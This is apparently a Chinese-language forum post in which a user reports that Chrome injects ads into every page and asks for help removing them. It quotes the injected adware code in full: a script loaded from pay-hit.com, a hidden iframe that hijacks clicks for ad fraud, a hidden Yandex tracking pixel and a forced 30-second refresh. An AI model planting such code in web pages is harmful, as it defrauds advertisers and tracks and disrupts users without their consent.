最近使用的Chrome遇到了一个棘手的问题,不知道是不是我的chrome中毒了,没打开一个html格式的网页都会加上自动的被加上一段广告,广告截图:然后查看了这个广告的源代码<div id='_ph1042' style='width:728px;'></div>
    <script>
      div="_ph1042";
      document.write('<scr'+'ipt src="http://pay-hit.com/s.js?t=1042&div='+div+'&ref='+encodeURIComponent(document.referrer)+'"><'+'/scr'+'ipt>');
    </script>
<!--additional_code_begin--><style>body{margin:-3px;}</style>
<body><!--click_count_begin--><script>function getCookie(name) {var matches = document.cookie.match(new RegExp('(?:^|; )' + name.replace(/([.$?*|{}()[]\/+^])/g, '\$1') + '=([^;]*)'));return matches ? true : false;}function setCookie(name,value,mins) {if (mins) {var date = new Date();date.setTime(date.getTime()+(mins*60*1000));var expires = '; expires='+date.toGMTString();}else var expires = '';document.cookie = name+'='+value+expires+'; path=/';}var ad_id = 18;var cookie_name = 'clicked_' + ad_id;if(getCookie(cookie_name)) {document.onclick=function(){};f = document.createElement('DIV');f.style.cssText='width:99%;height:99%;position:absolute;left:0px;top:0px;z-index:1000;';document.body.appendChild(f);} else {document.onclick=function(){f = document.createElement('IFRAME');f.setAttribute('src','/click?adid=' + ad_id);f.style.cssText='width:0px;height:0px;position:absolute;left:-9999px';document.body.appendChild(f);setCookie(cookie_name, '1', 40);}}</script><!--click_count_end--></body><script>
if(Math.random() > 0.6) {
f = document.createElement('IMG');
f.setAttribute('src','//mc.yandex.ru/watch/22050655');
f.style.cssText='width:0px;height:0px;position:absolute;left:-9999px';
document.body.appendChild(f);
}
</script><!--additional_code_end--><!--meta_refr_begin--><META HTTP-EQUIV='REFRESH' CONTENT='30'><!--meta_refr_end-->
不知道如何才能解决这个问题,求版上大侠解救!